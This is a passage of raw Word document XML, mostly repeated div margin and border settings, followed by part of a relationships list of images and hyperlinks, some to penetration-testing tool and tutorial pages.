      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1874222628">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1391423889">
              <w:marLeft w:val="960"/>
              <w:marRight w:val="960"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="683241847">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="227963476">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="320353828">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="100"/>
                          <w:marBottom w:val="100"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1862469529">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="116624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191701">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="713390553">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1990284388">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="100"/>
                          <w:marBottom w:val="100"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1959145098">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="210622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778924">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="479619660">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1193347737">
                  <w:marLeft w:val="960"/>
                  <w:marRight w:val="960"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="162403017">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1148784638">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="358430162">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="100"/>
                              <w:marBottom w:val="100"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="255484128">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="73081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7731826">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="455681453">
              <w:marLeft w:val="960"/>
              <w:marRight w:val="960"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="172651443">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="461922574">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="331688413">
                  <w:marLeft w:val="960"/>
                  <w:marRight w:val="960"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1594707847">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="152913283">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1446269277">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="100"/>
                              <w:marBottom w:val="100"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1393967111">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="19551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8523770">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1923026586">
              <w:marLeft w:val="960"/>
              <w:marRight w:val="960"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1257055513">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1270697644">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="225189108">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="100"/>
                          <w:marBottom w:val="100"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1686832826">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="8903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732242">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1999769018">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1870292732">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="100"/>
                          <w:marBottom w:val="100"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="2085368014">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="111872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465128">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="378556992">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1809854565">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="100"/>
                          <w:marBottom w:val="100"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1930966329">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="194460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7556488">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="213583048">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2080445072">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="935863887">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="798718863">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="963804831">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1119714771">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2064281679">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="545916659">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="592475503">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1589927736">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="9570952">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="271522943">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1388602218">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="56904423">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="195244257">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="10544234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ols.kali.org/maintaining-access/webshells" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netsparker.com/website-security-scanner/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.leidecker.info/downloads/index.shtml" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com/80" TargetMode="Externa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hyperlink" Target="https://hakshop.com/products/bash-bunny"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7.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingtutorials.org/networking/hacking-with-netcat-part-1-the-basics/" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.jpeg"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/pentest_swissky" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" 